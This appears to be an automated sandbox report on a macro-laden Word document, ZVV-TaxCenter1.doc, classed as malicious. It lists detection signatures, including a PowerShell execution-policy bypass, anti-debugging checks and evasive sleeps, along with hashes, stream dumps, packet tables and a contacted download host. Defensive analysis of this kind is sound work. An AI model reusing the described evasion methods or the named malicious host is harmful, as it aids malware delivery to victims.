Analysis Report
Overview
General Information | |
---|---|
Joe Sandbox Version: | 16.0.0 |
Analysis ID: | 167408 |
Start time: | 14:19:09 |
Joe Sandbox Product: | Cloud |
Start date: | 22.09.2016 |
Overall analysis duration: | 0h 4m 44s |
Report type: | full |
Sample file name: | ZVV-TaxCenter1.doc |
Cookbook file name: | defaultwindowsdocumentcookbook.jbs |
Analysis system description: | Windows 7 (Office 2010 v15, Java 1.8.0_40, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 41, Firefox 36) |
Number of new started processes analysed: | 9 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies | |
Detection: | MAL |
Classification: | mal76.evad.expl.troj.winDOC@5/16@3/3 |
HCA Information: | |
EGA Information: | Failed |
Cookbook Comments: | |
Warnings: | |
Detection |
---|
Strategy | Score | Range | Reporting | Detection |
---|---|---|---|---|
Threshold | 76 | 0 - 100 | Report FP / FN | |
Classification |
---|
Analysis Advice |
---|
Sample monitors Window changes (e.g. starting applications), analyze the sample with the 'Simulates keyboard and window changes' cookbook |
Sample sleeps for a long time, analyze it with the 'Bypass long sleeps' cookbook |
Uses HTTPS for network communication, use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis |
Signature Overview |
---|
Software Vulnerabilities: |
---|
Potential document exploit detected (performs DNS queries) |
Source: global traffic | DNS query: |
Potential document exploit detected (performs HTTP gets) |
Source: global traffic | TCP traffic: |
Potential document exploit detected (unknown TCP traffic) |
Source: global traffic | TCP traffic: |
Document exploit detected (process start blacklist hit) |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: |
Networking: |
---|
Urls found in memory or binary data |
Source: powershell.exe | String found in binary or memory: |
Source: WINWORD.EXE, powershell.exe | String found in binary or memory: |
Source: WINWORD.EXE | String found in binary or memory: |
Downloads files |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: |
Downloads files from webservers via HTTP |
Source: global traffic | HTTP traffic detected: |
Found strings which match to known social media urls |
Source: WINWORD.EXE | String found in binary or memory: |
Performs DNS lookups |
Source: unknown | DNS traffic detected: |
Tries to download non-existing http data (HTTP/1.1 404 Not Found) |
Source: global traffic | HTTP traffic detected: |
Uses HTTPS |
Source: unknown | Network traffic detected: |
HTTP GET or POST without a user agent |
Source: global traffic | HTTP traffic detected: |
May check the online IP address of the machine |
Source: unknown | DNS query: |
System Summary: |
---|
Checks whether correct version of .NET is installed |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Key opened: |
Uses Microsoft Silverlight |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: |
Document is a ZIP file with path names indicative for goodware |
Source: ZVV-TaxCenter1.doc | Initial sample: |
Checks if Microsoft Office is installed |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Key opened: |
Uses new MSVCR Dlls |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: |
Binary contains paths to debug symbols |
Source: | Binary string: |
Document has a 'vbamacros' value indicative for goodware |
Source: ZVV-TaxCenter1.doc | Initial sample: |
Binary contains paths to development resources |
Source: WINWORD.EXE | Binary or memory string: |
Classification label |
Source: classification engine | Classification label: |
Creates files inside the user directory |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: |
Creates temporary files |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: |
Found command line output |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: |
Parts of this application are using the .NET runtime (probably coded in C#) |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: |
Reads ini files |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File read: |
Reads software policies |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Key opened: |
Runs a DLL by calling functions |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: |
Spawns processes |
Source: unknown | Process created: |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: |
Uses an in-process (OLE) Automation server |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Key value queried: |
Creates mutexes |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: |
Document contains embedded VBA macros |
Source: ZVV-TaxCenter1.doc | OLE indicator, VBA macros: |
Document contains no OLE stream with summary information |
Source: ZVV-TaxCenter1.doc | OLE indicator has summary info: |
Document contains summary information with irregular field values |
Source: ZVV-TaxCenter1.doc | OLE document summary: |
Document has an unknown application name |
Source: ZVV-TaxCenter1.doc | OLE indicator application name: |
Document misses a certain OLE stream usually present in this Microsoft Office document type |
Source: ZVV-TaxCenter1.doc | OLE stream indicators for Word, Excel, PowerPoint, and Visio: |
Reads the hosts file |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File read: |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: |
Document contains an embedded VBA macro which executes code when the document is opened / closed |
Source: ZVV-TaxCenter1.doc | OLE, VBA macro line: |
Document contains an embedded VBA macro which may execute processes |
Source: ZVV-TaxCenter1.doc | OLE, VBA macro line: |
Document contains an embedded VBA macro with suspicious strings |
Source: ZVV-TaxCenter1.doc | OLE, VBA macro line: |
Document contains an embedded VBA with functions possibly related to HTTP operations |
Source: ZVV-TaxCenter1.doc | Stream path 'VBA/ThisDocument' : |
HIPS / PFW / Operating System Protection Evasion: |
---|
May try to detect the Windows Explorer process (often used for injection) |
Source: rundll32.exe | Binary or memory string: |
Bypasses PowerShell execution policy |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: |
System process connects to network (likely due to code injection or exploit) |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Network Connect: |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Network Connect: |
Anti Debugging: |
---|
Creates guard pages, often used to prevent reverse engineering and debugging |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory allocated: |
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation)) |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | System information queried: |
Enables debug privileges |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: |
Malware Analysis System Evasion: |
---|
Queries a list of all running processes |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: |
Contains long sleeps (>= 3 min) |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: |
Found a high number of Window / User specific system calls (may be a loop to detect user behavior) |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Window / User API: |
May sleep (evasive loops) to hinder dynamic analysis |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2160 | Thread sleep time: |
Hooking and other Techniques for Hiding and Protection: |
---|
Disables application error messages (SetErrorMode) |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: |
Source: C:\Windows\System32\rundll32.exe | Process information set: |
Lowering of HIPS / PFW / Operating System Security Settings: |
---|
AV process strings found (often used to terminate AV products) |
Source: powershell.exe | Binary or memory string: |
Language, Device and Operating System Detection: |
---|
Queries the cryptographic machine GUID |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Key value queried: |
Queries the installation date of Windows |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Registry key value queried: |
Queries the installation date of Windows |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Key value queried: |
Queries the volume information (name, serial number etc) of a device |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Queries volume information: |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: |
Behavior Graph |
---|
Yara Overview |
---|
No Yara matches |
---|
Screenshot |
---|
Startup |
---|
|
Created / dropped Files |
---|
File Path | Type and Hashes |
---|---|
Contacted Domains/Contacted IPs |
---|
Contacted Domains |
---|
Name | IP | Active |
---|---|---|
www.maxmind.com | 104.16.38.47 | true |
ebusiness-expert.eu | 84.246.227.126 | true |
Contacted IPs |
---|
IP | Country | ASN | ASN Name |
---|---|---|---|
84.246.227.126 | France | 34274 | ELBmultimedia |
8.8.8.8 | United States | 15169 | GoogleInc |
104.16.38.47 | United States | 13335 | CloudFlareInc |
Static File Info |
---|
General | |
---|---|
File type: | Microsoft Word 2007+ |
TrID: |
|
File name: | ZVV-TaxCenter1.doc |
File size: | 44812 |
MD5: | 09f16077acf6c05e5c293835b3a75a20 |
SHA1: | a8d3b38ac28178328f787e3956e45a63dd6cdbdd |
SHA256: | ef585e164af62907e9354a7d8991ec31d44737a25458ed143f66cd1e21ab9ebd |
SHA512: | 44c9abc1c2c0909be172bbeca1fe48c863a0909e43577cd8a24a04f2761a024eaeb9094d1511276ea35134d5c447712de3d14981c0b517e3ea5be6db1040d6c3 |
File Icon |
---|
Static OLE Info |
---|
General | |
---|---|
Document Type: | OpenXML |
Number of OLE Files: | 2 |
OLE File |
---|
Indicators | |
---|---|
Has Summary Info: | False |
Application Name: | unknown |
Encrypted Document: | False |
Contains Word Document Stream: | False |
Contains Workbook/Book Stream: | False |
Contains PowerPoint Document Stream: | False |
Contains Visio Document Stream: | False |
Contains ObjectPool Stream: | False |
Flash Objects Count: | 0 |
Contains VBA Macros: | True |
Streams with VBA |
---|
VBA File Name: ThisDocument.cls, Stream Size: 26817 |
---|
General | |
---|---|
Stream Path: | VBA/ThisDocument |
VBA File Name: | ThisDocument.cls |
Stream Size: | 26817 |
Data ASCII: | . . . . . ' . . . s < . . . . . . . . . . . < . . . < . . . V . . % . . . . . . . H . . 1 . . . . c . . . . . . . . . . . . . . . . . . . . . . . . . . . H . . . . . . . . . . q @ H . . . . h . . . . . . . . . . . . . . . . . . F . . . . . . . . . . . . . . . . . . . . . . . X f Q l G . . 6 . . . ? J . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . # . G i f t , 0 , 0 , M S I N K A U T L i b , I n k P i c t u r e . . . . X f Q l G . . 6 . . . ? J . . . . . q @ H . . . |
Data Raw: | 01 16 01 00 06 27 01 00 00 73 3c 00 00 0b 01 00 00 af 02 00 00 cd 3c 00 00 e7 3c 00 00 fb 56 00 00 25 00 00 00 01 00 00 00 48 f2 16 31 00 00 ff ff 63 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 48 00 ff ff 00 00 a2 ac c5 a0 ca 71 40 48 94 0f 15 db 68 a5 1d 1a 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 00 00 00 00 00 00 00 00 00 |
VBA Code with Deobfuscations |
---|
|
VBA Code |
---|
|
Streams |
---|
Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 439 |
---|
General | |
---|---|
Stream Path: | PROJECT |
File Type: | ASCII text, with CRLF line terminators |
Stream Size: | 439 |
Entropy: | 5.09486815787 |
Base64 Encoded: | True |
Data ASCII: | I D = " { D 4 D 0 8 5 0 D - F D B 9 - 4 8 2 B - B 7 7 C - F F 4 3 6 F 9 2 8 A F D } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 3 A 3 8 1 4 5 C 4 A 6 0 4 A 6 0 4 A 6 0 4 A 6 0 " . . D P B = " 7 4 7 6 5 A 9 E A E D 9 A F D 9 A F D 9 " . . G C = " A E A C 8 0 E 0 8 0 2 0 B B 2 1 B B 2 1 4 4 " . . . . [ H o s t E x t e n d e r I n f |
Data Raw: | 49 44 3d 22 7b 44 34 44 30 38 35 30 44 2d 46 44 42 39 2d 34 38 32 42 2d 42 37 37 43 2d 46 46 34 33 36 46 39 32 38 41 46 44 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4e 61 6d 65 3d 22 50 72 6f 6a 65 63 74 22 0d 0a 48 65 6c 70 43 6f 6e 74 65 78 74 49 44 3d 22 30 22 0d 0a 56 65 72 73 69 6f 6e 43 6f 6d 70 61 74 69 |
Stream Path: PROJECTwm, File Type: data, Stream Size: 41 |
---|
General | |
---|---|
Stream Path: | PROJECTwm |
File Type: | data |
Stream Size: | 41 |
Entropy: | 3.07738448508 |
Base64 Encoded: | False |
Data ASCII: | T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . . . |
Data Raw: | 54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 00 00 |
Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 4086 |
---|
General | |
---|---|
Stream Path: | VBA/_VBA_PROJECT |
File Type: | data |
Stream Size: | 4086 |
Entropy: | 4.93054967713 |
Base64 Encoded: | True |
Data ASCII: | . a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 1 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . |
Data Raw: | cc 61 97 00 00 01 00 ff 07 08 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 31 00 23 00 |
Stream Path: VBA/__SRP_0, File Type: data, Stream Size: 2349 |
---|
General | |
---|---|
Stream Path: | VBA/__SRP_0 |
File Type: | data |
Stream Size: | 2349 |
Entropy: | 4.49001368489 |
Base64 Encoded: | True |
Data ASCII: | . K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r U . . . . . . . . . . . . . . . . . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . d q . . P @ . . & . 9 . { . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . . . . . . . . . . . % . . . . . . . . . 1 . . . . . . . I . . . . . . . a . . . |
Data Raw: | 93 4b 2a 97 01 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 00 00 00 00 00 00 01 00 02 00 00 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 00 00 72 55 00 02 00 00 80 00 00 00 80 00 00 00 80 00 00 00 04 00 00 7e 05 00 00 7e 01 00 00 7e 01 00 00 7e 01 00 00 7e 01 00 00 7e 01 00 00 7e 01 00 00 7e 68 00 00 7f |
Stream Path: VBA/__SRP_1, File Type: data, Stream Size: 451 |
---|
General | |
---|---|
Stream Path: | VBA/__SRP_1 |
File Type: | data |
Stream Size: | 451 |
Entropy: | 3.80501371853 |
Base64 Encoded: | False |
Data ASCII: | r U . . . . . . . . . . . . . . . . . . . ~ . . . ~ . . . ~ . . . ~ w . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . I . . . . . . . . . . . . . . . . . . . . . . . . . . . q . . . . . . . . . . . . . . . . . . . . . . . G i f t . . . . . . . . . . . . . . . . . . . . ( . . . . . . . . . . . . . . . F r v x s f J . . . . . . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . N g s G M o s . . . . . . . . r k i p i o e . . . . . . . . R |
Data Raw: | 72 55 80 00 00 00 80 00 00 00 80 00 00 00 80 00 00 00 01 00 00 7e 01 00 00 7e 01 00 00 7e 01 00 00 7e 77 00 00 7f 00 00 00 00 0a 00 00 00 09 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 09 00 00 00 00 00 03 00 03 00 00 09 11 07 00 00 00 00 00 00 49 08 00 00 00 00 00 00 08 00 00 00 00 00 01 00 03 00 00 09 b1 02 00 00 00 00 00 00 71 08 00 00 00 00 00 00 18 00 |
Stream Path: VBA/__SRP_2, File Type: data, Stream Size: 3144 |
---|
General | |
---|---|
Stream Path: | VBA/__SRP_2 |
File Type: | data |
Stream Size: | 3144 |
Entropy: | 2.08331951533 |
Base64 Encoded: | False |
Data ASCII: | r U . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 0 . . . . . . . % . % . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . i . . . . . . . . . * . < . . . . . . . . . . . a . . . . . . . 1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 72 55 80 01 00 00 00 00 00 00 80 00 00 00 80 00 00 00 00 00 00 00 1e 00 00 00 09 00 00 00 00 00 00 00 09 00 00 00 00 00 03 00 30 00 00 00 00 00 00 00 25 00 25 00 00 00 00 00 01 00 01 00 00 00 02 00 91 07 00 00 00 00 00 00 b9 07 00 00 00 00 00 00 e1 07 00 00 00 00 00 00 ff ff ff ff 69 07 00 00 00 00 00 00 0a 00 2a 00 3c 00 00 00 09 08 00 00 00 00 00 00 61 00 00 00 00 00 01 00 31 08 |
Stream Path: VBA/__SRP_3, File Type: data, Stream Size: 1881 |
---|
General | |
---|---|
Stream Path: | VBA/__SRP_3 |
File Type: | data |
Stream Size: | 1881 |
Entropy: | 3.16093108335 |
Base64 Encoded: | False |
Data ASCII: | r U . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . L . . . . . 0 . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $ . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . ( . 9 . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . 0 ( . y . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . 0 $ . . . . . . . . . . . . ` . . . . . . |
Data Raw: | 72 55 80 00 00 00 00 00 00 00 80 00 00 00 80 00 00 00 00 00 00 00 10 00 00 00 09 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff 00 00 00 00 4c 00 00 00 04 00 30 00 b9 01 00 00 00 00 02 00 00 00 03 60 08 00 e1 06 1c 00 ff ff ff ff ff ff ff ff 00 00 00 00 d9 00 00 00 00 00 01 00 11 01 00 00 00 00 01 00 00 00 00 00 1e 08 1d f1 00 00 00 00 00 01 00 24 00 f9 01 00 00 00 00 02 00 01 00 03 |
Stream Path: VBA/dir, File Type: data, Stream Size: 787 |
---|
General | |
---|---|
Stream Path: | VBA/dir |
File Type: | data |
Stream Size: | 787 |
Entropy: | 6.37385461279 |
Base64 Encoded: | True |
Data ASCII: | . . . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . . l . . . . . . . . . . ` . Y . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 . 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s W O W 6 . 4 \\ . e 2 . t l b . # O L E A u t . o m a t i o n . ` . . . . E O f f i c . E . O . f . . i . c . E . . . . . . . . E 2 D F . 8 D 0 4 C - 5 B . F |
Data Raw: | 01 0f b3 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 d0 60 ad 59 03 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30 |
OLE File |
---|
Indicators | |
---|---|
Has Summary Info: | False |
Application Name: | unknown |
Encrypted Document: | False |
Contains Word Document Stream: | False |
Contains Workbook/Book Stream: | False |
Contains PowerPoint Document Stream: | False |
Contains Visio Document Stream: | False |
Contains ObjectPool Stream: | False |
Flash Objects Count: | 0 |
Contains VBA Macros: | False |
Streams |
---|
Stream Path: Contents, File Type: data, Stream Size: 94 |
---|
General | |
---|---|
Stream Path: | Contents |
File Type: | data |
Stream Size: | 94 |
Entropy: | 1.91679403077 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . ^ . . . . . . . 4 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 02 00 00 00 20 07 c5 08 5e 00 00 00 00 00 00 00 34 12 cd ab 02 00 00 00 02 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 ff ff 00 00 05 00 00 80 00 00 00 00 01 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff 00 00 00 00 00 80 00 00 00 80 00 00 00 00 00 00 00 00 02 00 00 00 00 00 |
Network Behavior |
---|
Network Port Distribution |
---|
TCP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Sep 22, 2016 14:20:40.127125025 CEST | 64828 | 53 | 192.168.1.16 | 8.8.8.8 |
Sep 22, 2016 14:20:40.908885956 CEST | 53 | 64828 | 8.8.8.8 | 192.168.1.16 |
Sep 22, 2016 14:20:41.614145994 CEST | 49906 | 53 | 192.168.1.16 | 8.8.8.8 |
Sep 22, 2016 14:20:41.777976036 CEST | 53 | 49906 | 8.8.8.8 | 192.168.1.16 |
Sep 22, 2016 14:20:41.779290915 CEST | 49178 | 443 | 192.168.1.16 | 104.16.38.47 |
Sep 22, 2016 14:20:41.779318094 CEST | 443 | 49178 | 104.16.38.47 | 192.168.1.16 |
Sep 22, 2016 14:20:41.779747009 CEST | 49178 | 443 | 192.168.1.16 | 104.16.38.47 |
Sep 22, 2016 14:20:41.823200941 CEST | 49178 | 443 | 192.168.1.16 | 104.16.38.47 |
Sep 22, 2016 14:20:41.823227882 CEST | 443 | 49178 | 104.16.38.47 | 192.168.1.16 |
Sep 22, 2016 14:20:44.050091028 CEST | 443 | 49178 | 104.16.38.47 | 192.168.1.16 |
Sep 22, 2016 14:20:44.165142059 CEST | 443 | 49178 | 104.16.38.47 | 192.168.1.16 |
Sep 22, 2016 14:20:44.165169001 CEST | 443 | 49178 | 104.16.38.47 | 192.168.1.16 |
Sep 22, 2016 14:20:44.165364981 CEST | 49178 | 443 | 192.168.1.16 | 104.16.38.47 |
Sep 22, 2016 14:20:44.165400028 CEST | 443 | 49178 | 104.16.38.47 | 192.168.1.16 |
Sep 22, 2016 14:20:44.379561901 CEST | 443 | 49178 | 104.16.38.47 | 192.168.1.16 |
Sep 22, 2016 14:20:44.379746914 CEST | 49178 | 443 | 192.168.1.16 | 104.16.38.47 |
Sep 22, 2016 14:20:44.565505981 CEST | 49178 | 443 | 192.168.1.16 | 104.16.38.47 |
Sep 22, 2016 14:20:44.565541983 CEST | 443 | 49178 | 104.16.38.47 | 192.168.1.16 |
Sep 22, 2016 14:20:44.808506012 CEST | 443 | 49178 | 104.16.38.47 | 192.168.1.16 |
Sep 22, 2016 14:20:45.035645962 CEST | 49178 | 443 | 192.168.1.16 | 104.16.38.47 |
Sep 22, 2016 14:20:45.035675049 CEST | 443 | 49178 | 104.16.38.47 | 192.168.1.16 |
Sep 22, 2016 14:20:45.284166098 CEST | 443 | 49178 | 104.16.38.47 | 192.168.1.16 |
Sep 22, 2016 14:20:45.398906946 CEST | 443 | 49178 | 104.16.38.47 | 192.168.1.16 |
Sep 22, 2016 14:20:45.398940086 CEST | 443 | 49178 | 104.16.38.47 | 192.168.1.16 |
Sep 22, 2016 14:20:45.399053097 CEST | 49178 | 443 | 192.168.1.16 | 104.16.38.47 |
Sep 22, 2016 14:20:45.399070978 CEST | 443 | 49178 | 104.16.38.47 | 192.168.1.16 |
Sep 22, 2016 14:20:45.408037901 CEST | 443 | 49178 | 104.16.38.47 | 192.168.1.16 |
Sep 22, 2016 14:20:45.408092976 CEST | 443 | 49178 | 104.16.38.47 | 192.168.1.16 |
Sep 22, 2016 14:20:45.408174038 CEST | 49178 | 443 | 192.168.1.16 | 104.16.38.47 |
Sep 22, 2016 14:20:45.408586025 CEST | 49178 | 443 | 192.168.1.16 | 104.16.38.47 |
Sep 22, 2016 14:20:45.408622980 CEST | 443 | 49178 | 104.16.38.47 | 192.168.1.16 |
Sep 22, 2016 14:20:50.512084961 CEST | 56904 | 53 | 192.168.1.16 | 8.8.8.8 |
Sep 22, 2016 14:20:50.907779932 CEST | 53 | 56904 | 8.8.8.8 | 192.168.1.16 |
Sep 22, 2016 14:20:50.955172062 CEST | 49179 | 80 | 192.168.1.16 | 84.246.227.126 |
Sep 22, 2016 14:20:50.955213070 CEST | 80 | 49179 | 84.246.227.126 | 192.168.1.16 |
Sep 22, 2016 14:20:50.955291033 CEST | 49179 | 80 | 192.168.1.16 | 84.246.227.126 |
Sep 22, 2016 14:20:50.956690073 CEST | 49179 | 80 | 192.168.1.16 | 84.246.227.126 |
Sep 22, 2016 14:20:50.956716061 CEST | 80 | 49179 | 84.246.227.126 | 192.168.1.16 |
Sep 22, 2016 14:20:52.225730896 CEST | 80 | 49179 | 84.246.227.126 | 192.168.1.16 |
Sep 22, 2016 14:20:52.427665949 CEST | 80 | 49179 | 84.246.227.126 | 192.168.1.16 |
Sep 22, 2016 14:20:52.427788019 CEST | 49179 | 80 | 192.168.1.16 | 84.246.227.126 |
Sep 22, 2016 14:20:52.670106888 CEST | 49179 | 80 | 192.168.1.16 | 84.246.227.126 |
UDP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Sep 22, 2016 14:20:40.127125025 CEST | 64828 | 53 | 192.168.1.16 | 8.8.8.8 |
Sep 22, 2016 14:20:40.908885956 CEST | 53 | 64828 | 8.8.8.8 | 192.168.1.16 |
Sep 22, 2016 14:20:41.614145994 CEST | 49906 | 53 | 192.168.1.16 | 8.8.8.8 |
Sep 22, 2016 14:20:41.777976036 CEST | 53 | 49906 | 8.8.8.8 | 192.168.1.16 |
Sep 22, 2016 14:20:50.512084961 CEST | 56904 | 53 | 192.168.1.16 | 8.8.8.8 |
Sep 22, 2016 14:20:50.907779932 CEST | 53 | 56904 | 8.8.8.8 | 192.168.1.16 |
ICMP Packets |
---|
Timestamp | Source IP | Dest IP | Checksum | Code | Type |
---|---|---|---|---|---|
Sep 22, 2016 14:22:24.778304100 CEST | 192.168.1.16 | 8.8.8.8 | cf09 | (Port unreachable) | Destination Unreachable |
DNS Queries |
---|
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
---|---|---|---|---|---|---|---|
Sep 22, 2016 14:20:40.127125025 CEST | 192.168.1.16 | 8.8.8.8 | 0x128c | Standard query (0) | www.maxmind.com | A (IP address) | IN (0x0001) |
Sep 22, 2016 14:20:41.614145994 CEST | 192.168.1.16 | 8.8.8.8 | 0x6864 | Standard query (0) | www.maxmind.com | A (IP address) | IN (0x0001) |
Sep 22, 2016 14:20:50.512084961 CEST | 192.168.1.16 | 8.8.8.8 | 0xd2ef | Standard query (0) | ebusiness-expert.eu | A (IP address) | IN (0x0001) |
DNS Answers |
---|
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
---|---|---|---|---|---|---|---|---|---|
Sep 22, 2016 14:20:40.908885956 CEST | 8.8.8.8 | 192.168.1.16 | 0x128c | No error (0) | www.maxmind.com | | 104.16.38.47 | A (IP address) | IN (0x0001) |
Sep 22, 2016 14:20:41.777976036 CEST | 8.8.8.8 | 192.168.1.16 | 0x6864 | No error (0) | www.maxmind.com | | 104.16.38.47 | A (IP address) | IN (0x0001) |
Sep 22, 2016 14:20:50.907779932 CEST | 8.8.8.8 | 192.168.1.16 | 0xd2ef | No error (0) | ebusiness-expert.eu | | 84.246.227.126 | A (IP address) | IN (0x0001) |
HTTP Request Dependency Graph |
---|
HTTP Packets |
---|
